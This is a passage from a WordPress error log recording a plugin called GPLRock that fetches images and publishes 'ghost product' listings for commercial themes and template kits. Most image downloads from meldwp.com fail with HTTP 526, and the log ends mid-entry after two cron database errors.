Retrying... [05-Apr-2026 06:19:15 UTC] GPLRock: Image download failed for product citrus-one-page-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/citrus---one-page-wordpress-21233.webp for product citrus-one-page-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:17 UTC] GPLRock WARNING: Image download failed for product citrus-one-page-wordpress. URL: https://meldwp.com/wp-content/uploads/citrus---one-page-wordpress-21233.webp [05-Apr-2026 06:19:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: citrus-one-page-wordpress [05-Apr-2026 06:19:17 UTC] GPLRock: Image download failed for product clickbuy-woocommerce-responsive-digital-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:19 UTC] GPLRock: Image download failed for product clickbuy-woocommerce-responsive-digital-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clickbuy---woocommerce-responsive-digital-theme-27102.webp for product clickbuy-woocommerce-responsive-digital-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:21 UTC] GPLRock: Image download failed for product clickbuy-woocommerce-responsive-digital-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:23 UTC] GPLRock: Image download failed for product clickbuy-woocommerce-responsive-digital-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clickbuy---woocommerce-responsive-digital-theme-27102.webp for product clickbuy-woocommerce-responsive-digital-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:25 UTC] GPLRock WARNING: Image download failed for product clickbuy-woocommerce-responsive-digital-theme. URL: https://meldwp.com/wp-content/uploads/clickbuy---woocommerce-responsive-digital-theme-27102.webp [05-Apr-2026 06:19:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clickbuy-woocommerce-responsive-digital-theme [05-Apr-2026 06:19:26 UTC] GPLRock: Image download failed for product nubi-digital-marketing-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:28 UTC] GPLRock: Image download failed for product nubi-digital-marketing-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nubi---digital-marketing--seo-wordpress-theme-13377.webp for product nubi-digital-marketing-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:30 UTC] GPLRock: Image download failed for product nubi-digital-marketing-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:32 UTC] GPLRock: Image download failed for product nubi-digital-marketing-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nubi---digital-marketing--seo-wordpress-theme-13377.webp for product nubi-digital-marketing-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:34 UTC] GPLRock WARNING: Image download failed for product nubi-digital-marketing-seo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nubi---digital-marketing--seo-wordpress-theme-13377.webp [05-Apr-2026 06:19:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nubi-digital-marketing-seo-wordpress-theme [05-Apr-2026 06:19:34 UTC] GPLRock: Image download failed for product old-haven-elderly-home-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:36 UTC] GPLRock: Image download failed for product old-haven-elderly-home-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/old-haven--elderly-home-senior-care-wordpress-theme-336.webp for product old-haven-elderly-home-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:39 UTC] GPLRock: Image download failed for product old-haven-elderly-home-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:41 UTC] GPLRock: Image download failed for product old-haven-elderly-home-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/old-haven--elderly-home-senior-care-wordpress-theme-336.webp for product old-haven-elderly-home-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:43 UTC] GPLRock WARNING: Image download failed for product old-haven-elderly-home-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/old-haven--elderly-home-senior-care-wordpress-theme-336.webp [05-Apr-2026 06:19:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: old-haven-elderly-home-senior-care-wordpress-theme [05-Apr-2026 06:19:43 UTC] GPLRock: Image download failed for product broly-creative-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:45 UTC] GPLRock: Image download failed for product broly-creative-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/broly---creative-multi-concept-wordpress-theme-292.webp for product broly-creative-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:47 UTC] GPLRock: Image download failed for product broly-creative-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:49 UTC] GPLRock: Image download failed for product broly-creative-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/broly---creative-multi-concept-wordpress-theme-292.webp for product broly-creative-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:52 UTC] GPLRock WARNING: Image download failed for product broly-creative-multi-concept-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/broly---creative-multi-concept-wordpress-theme-292.webp [05-Apr-2026 06:19:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: broly-creative-multi-concept-wordpress-theme [05-Apr-2026 06:19:52 UTC] GPLRock: Image download failed for product companion-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:54 UTC] GPLRock: Image download failed for product companion-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/companion---corporate-business-wordpress-theme-30329.webp for product companion-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:56 UTC] GPLRock: Image download failed for product companion-corporate-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:58 UTC] GPLRock: Image download failed for product companion-corporate-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/companion---corporate-business-wordpress-theme-30329.webp for product companion-corporate-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:20:00 UTC] GPLRock WARNING: Image download failed for product companion-corporate-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/companion---corporate-business-wordpress-theme-30329.webp [05-Apr-2026 06:20:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: companion-corporate-business-wordpress-theme [05-Apr-2026 06:20:00 UTC] GPLRock: Image download failed for product luxia-beauty-spa-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:02 UTC] GPLRock: Image download failed for product luxia-beauty-spa-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxia-beauty--spa-center-wordpress-theme-19695.webp for product luxia-beauty-spa-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:20:05 UTC] GPLRock: Image download failed for product luxia-beauty-spa-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:07 UTC] GPLRock: Image download failed for product luxia-beauty-spa-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxia-beauty--spa-center-wordpress-theme-19695.webp for product luxia-beauty-spa-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:20:09 UTC] GPLRock WARNING: Image download failed for product luxia-beauty-spa-center-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxia-beauty--spa-center-wordpress-theme-19695.webp [05-Apr-2026 06:20:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxia-beauty-spa-center-wordpress-theme [05-Apr-2026 06:20:09 UTC] GPLRock: Image download failed for product xtrail-extreme-sports-and-outdoors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:11 UTC] GPLRock: Image download failed for product xtrail-extreme-sports-and-outdoors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xtrail---extreme-sports-and-outdoors-wordpress-theme-19265.webp for product xtrail-extreme-sports-and-outdoors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:20:13 UTC] GPLRock: Image download failed for product xtrail-extreme-sports-and-outdoors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:15 UTC] GPLRock: Image download failed for product xtrail-extreme-sports-and-outdoors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:20:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xtrail---extreme-sports-and-outdoors-wordpress-theme-19265.webp for product xtrail-extreme-sports-and-outdoors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:20:17 UTC] GPLRock WARNING: Image download failed for product xtrail-extreme-sports-and-outdoors-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xtrail---extreme-sports-and-outdoors-wordpress-theme-19265.webp [05-Apr-2026 06:20:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xtrail-extreme-sports-and-outdoors-wordpress-theme [05-Apr-2026 06:21:00 UTC] GPLRock: Image downloaded successfully for product transposh-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1aa4a847.png [05-Apr-2026 06:21:00 UTC] GPLRock: Using pre-downloaded image for product transposh-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1aa4a847.png [05-Apr-2026 06:21:00 UTC] GPLRock: Ghost product published with image - Product ID: transposh-for-amp [05-Apr-2026 06:21:01 UTC] GPLRock: Image downloaded successfully for product subdomain-endpoints-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac097bf3.png [05-Apr-2026 06:21:02 UTC] GPLRock: Using pre-downloaded image for product subdomain-endpoints-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac097bf3.png [05-Apr-2026 06:21:02 UTC] GPLRock: Ghost product published with image - Product ID: subdomain-endpoints-for-amp [05-Apr-2026 06:21:03 UTC] GPLRock: Image downloaded successfully for product content-teaser-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fa463ef.png [05-Apr-2026 06:21:03 UTC] GPLRock: Using pre-downloaded image for product content-teaser-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7fa463ef.png [05-Apr-2026 06:21:03 UTC] GPLRock: Ghost product published with image - Product ID: content-teaser-for-amp [05-Apr-2026 06:21:05 UTC] GPLRock: Image downloaded successfully for product pinterest-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e442224c.png [05-Apr-2026 06:21:05 UTC] GPLRock: Using pre-downloaded image for product pinterest-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e442224c.png [05-Apr-2026 06:21:05 UTC] GPLRock: Ghost product published with image - Product ID: pinterest-for-amp [05-Apr-2026 06:21:06 UTC] GPLRock: Image downloaded successfully for product learndash-lms-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82cf7bf1.jpg [05-Apr-2026 06:21:06 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-82cf7bf1.jpg [05-Apr-2026 06:21:06 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-notifications [05-Apr-2026 06:21:08 UTC] GPLRock: Image downloaded successfully for product homeid-real-estate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15499dab.jpg [05-Apr-2026 06:21:08 UTC] GPLRock: Using pre-downloaded image for product homeid-real-estate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-15499dab.jpg [05-Apr-2026 06:21:08 UTC] GPLRock: Ghost product published with image - Product ID: homeid-real-estate-wordpress-theme [05-Apr-2026 06:21:10 UTC] GPLRock: Image downloaded successfully for product lunfest-festival-concert-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb8e60c1.jpg [05-Apr-2026 06:21:10 UTC] GPLRock: Using pre-downloaded image for product lunfest-festival-concert-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb8e60c1.jpg [05-Apr-2026 06:21:10 UTC] GPLRock: Ghost product published with image - Product ID: lunfest-festival-concert-wordpress-theme [05-Apr-2026 06:21:12 UTC] GPLRock: Image downloaded successfully for product gamipress-leaderboards (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dca27c87.jpg [05-Apr-2026 06:21:12 UTC] GPLRock: Using pre-downloaded image for product gamipress-leaderboards: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dca27c87.jpg [05-Apr-2026 06:21:12 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-leaderboards [05-Apr-2026 06:21:13 UTC] GPLRock: Image downloaded successfully for product gamipress-progress-map (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ccc1f9f4.webp [05-Apr-2026 06:21:13 UTC] GPLRock: Using pre-downloaded image for product gamipress-progress-map: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ccc1f9f4.webp [05-Apr-2026 06:21:13 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-progress-map [05-Apr-2026 06:21:15 UTC] GPLRock: Image downloaded successfully for product gamipress-progress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ccc39ab.webp [05-Apr-2026 06:21:15 UTC] GPLRock: Using pre-downloaded image for product gamipress-progress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ccc39ab.webp [05-Apr-2026 06:21:15 UTC] GPLRock: Ghost product published with image - Product ID: gamipress-progress [05-Apr-2026 06:22:18 UTC] GPLRock: Image downloaded successfully for product koffe-cafe-coffee-shop-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78fb5f76.webp [05-Apr-2026 06:22:18 UTC] GPLRock: Using pre-downloaded image for product koffe-cafe-coffee-shop-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78fb5f76.webp [05-Apr-2026 06:22:18 UTC] GPLRock: Ghost product published with image - Product ID: koffe-cafe-coffee-shop-template-kit [05-Apr-2026 06:22:19 UTC] GPLRock: Image downloaded successfully for product flaire-dance-school-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a200bf2.webp [05-Apr-2026 06:22:19 UTC] GPLRock: Using pre-downloaded image for product flaire-dance-school-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a200bf2.webp [05-Apr-2026 06:22:19 UTC] GPLRock: Ghost product published with image - Product ID: flaire-dance-school-studio-elementor-template-kit [05-Apr-2026 06:22:21 UTC] GPLRock: Image downloaded successfully for product fixman-smartphone-laptop-pc-repair-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7c55b62.webp [05-Apr-2026 06:22:21 UTC] GPLRock: Using pre-downloaded image for product fixman-smartphone-laptop-pc-repair-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7c55b62.webp [05-Apr-2026 06:22:21 UTC] GPLRock: Ghost product published with image - Product ID: fixman-smartphone-laptop-pc-repair-elementor-kit [05-Apr-2026 06:22:22 UTC] GPLRock: Image downloaded successfully for product fitgym-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8ded6a0.webp [05-Apr-2026 06:22:22 UTC] GPLRock: Using pre-downloaded image for product fitgym-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8ded6a0.webp [05-Apr-2026 06:22:22 UTC] GPLRock: Ghost product published with image - Product ID: fitgym-fitness-gym-elementor-template-kit [05-Apr-2026 06:22:23 UTC] GPLRock: Image downloaded successfully for product fit-factory-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc48fa20.webp [05-Apr-2026 06:22:24 UTC] GPLRock: Using pre-downloaded image for product fit-factory-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc48fa20.webp [05-Apr-2026 06:22:24 UTC] GPLRock: Ghost product published with image - Product ID: fit-factory-fitness-gym-elementor-template-kit [05-Apr-2026 06:22:25 UTC] GPLRock: Image downloaded successfully for product finconsult-financial-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9680dd0.webp [05-Apr-2026 06:22:25 UTC] GPLRock: Using pre-downloaded image for product finconsult-financial-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a9680dd0.webp [05-Apr-2026 06:22:25 UTC] GPLRock: Ghost product published with image - Product ID: finconsult-financial-consulting-elementor-template-kit [05-Apr-2026 06:22:27 UTC] GPLRock: Image downloaded successfully for product fillo-shoes-sneakers-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-328b3641.webp [05-Apr-2026 06:22:27 UTC] GPLRock: Using pre-downloaded image for product fillo-shoes-sneakers-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-328b3641.webp [05-Apr-2026 06:22:27 UTC] GPLRock: Ghost product published with image - Product ID: fillo-shoes-sneakers-store-woocommerce-elementor-template-kit [05-Apr-2026 06:22:28 UTC] GPLRock: Image downloaded successfully for product festival-events-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f3b59ce.webp [05-Apr-2026 06:22:29 UTC] GPLRock: Using pre-downloaded image for product festival-events-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f3b59ce.webp [05-Apr-2026 06:22:29 UTC] GPLRock: Ghost product published with image - Product ID: festival-events-elementor-template-kit [05-Apr-2026 06:22:30 UTC] GPLRock: Image downloaded successfully for product fashionable-fashion-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3af922cc.webp [05-Apr-2026 06:22:30 UTC] GPLRock: Using pre-downloaded image for product fashionable-fashion-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3af922cc.webp [05-Apr-2026 06:22:30 UTC] GPLRock: Ghost product published with image - Product ID: fashionable-fashion-shop-elementor-template-kit [05-Apr-2026 06:22:31 UTC] GPLRock: Image downloaded successfully for product ewa-beauty-spa-salon-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4e0639f.webp [05-Apr-2026 06:22:32 UTC] GPLRock: Using pre-downloaded image for product ewa-beauty-spa-salon-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4e0639f.webp [05-Apr-2026 06:22:32 UTC] GPLRock: Ghost product published with image - Product ID: ewa-beauty-spa-salon-elementor-template-kit [05-Apr-2026 06:23:47 UTC] GPLRock: Image downloaded successfully for product calafate-portfolio-woocommerce-creative-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1248b73d.avif [05-Apr-2026 06:23:47 UTC] GPLRock: Using pre-downloaded image for product calafate-portfolio-woocommerce-creative-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1248b73d.avif [05-Apr-2026 06:23:47 UTC] GPLRock: Ghost product published with image - Product ID: calafate-portfolio-woocommerce-creative-wordpress-theme [05-Apr-2026 06:23:48 UTC] GPLRock: Image downloaded successfully for product bluecollar-handyman-renovation-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78b75f31.avif [05-Apr-2026 06:23:48 UTC] GPLRock: Using pre-downloaded image for product bluecollar-handyman-renovation-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78b75f31.avif [05-Apr-2026 06:23:48 UTC] GPLRock: Ghost product published with image - Product ID: bluecollar-handyman-renovation-business-wordpress-theme [05-Apr-2026 06:23:49 UTC] GPLRock: Image downloaded successfully for product bricks-builder-build-wordpress-sites-that-rank (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91637ad6.jpg [05-Apr-2026 06:23:50 UTC] GPLRock: Using pre-downloaded image for product bricks-builder-build-wordpress-sites-that-rank: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91637ad6.jpg [05-Apr-2026 06:23:50 UTC] GPLRock: Ghost product published with image - Product ID: bricks-builder-build-wordpress-sites-that-rank [05-Apr-2026 06:23:51 UTC] GPLRock: Image downloaded successfully for product happyforms-pro-friendly-drag-and-drop-contact-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51a88cf1.webp [05-Apr-2026 06:23:51 UTC] GPLRock: Using pre-downloaded image for product happyforms-pro-friendly-drag-and-drop-contact-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51a88cf1.webp [05-Apr-2026 06:23:51 UTC] GPLRock: Ghost product published with image - Product ID: happyforms-pro-friendly-drag-and-drop-contact-form-builder [05-Apr-2026 06:23:52 UTC] GPLRock: Image downloaded successfully for product real-voice-ai-text-to-speech-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4e9a76f.avif [05-Apr-2026 06:23:52 UTC] GPLRock: Using pre-downloaded image for product real-voice-ai-text-to-speech-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a4e9a76f.avif [05-Apr-2026 06:23:52 UTC] GPLRock: Ghost product published with image - Product ID: real-voice-ai-text-to-speech-plugin-for-wordpress [05-Apr-2026 06:23:54 UTC] GPLRock: Image downloaded successfully for product monsterinsights-ppc-tracking-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238f3ecc.webp [05-Apr-2026 06:23:54 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-ppc-tracking-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238f3ecc.webp [05-Apr-2026 06:23:54 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-ppc-tracking-addon [05-Apr-2026 06:23:56 UTC] GPLRock: Image downloaded successfully for product ast-fulfillment-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34888a63.webp [05-Apr-2026 06:23:56 UTC] GPLRock: Using pre-downloaded image for product ast-fulfillment-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34888a63.webp [05-Apr-2026 06:23:56 UTC] GPLRock: Ghost product published with image - Product ID: ast-fulfillment-manager [05-Apr-2026 06:23:57 UTC] GPLRock: Image downloaded successfully for product affiliatewp-affiliate-area-tabs (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6fdece7a.jpg [05-Apr-2026 06:23:57 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-affiliate-area-tabs: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6fdece7a.jpg [05-Apr-2026 06:23:57 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-affiliate-area-tabs [05-Apr-2026 06:23:58 UTC] GPLRock: Image downloaded successfully for product affiliatewp-vanity-coupon-codes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38f54841.webp [05-Apr-2026 06:23:58 UTC] GPLRock: Using pre-downloaded image for product affiliatewp-vanity-coupon-codes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38f54841.webp [05-Apr-2026 06:23:58 UTC] GPLRock: Ghost product published with image - Product ID: affiliatewp-vanity-coupon-codes [05-Apr-2026 06:24:00 UTC] GPLRock: Image downloaded successfully for product woocommerce-quote (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34d022c3.avif [05-Apr-2026 06:24:00 UTC] GPLRock: Using pre-downloaded image for product woocommerce-quote: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-34d022c3.avif [05-Apr-2026 06:24:00 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-quote [05-Apr-2026 06:24:04 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 06:24:04 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775370244.4671568870544433593750', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 06:25:42 UTC] GPLRock: Image download failed for product cascade-personal-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:44 UTC] GPLRock: Image download failed for product cascade-personal-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cascade---personal-vcard-wordpress-theme-13627.webp for product cascade-personal-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:25:46 UTC] GPLRock: Image download failed for product cascade-personal-vcard-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:48 UTC] GPLRock: Image download failed for product cascade-personal-vcard-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:50 UTC] GPLRock Error: Failed to download image from 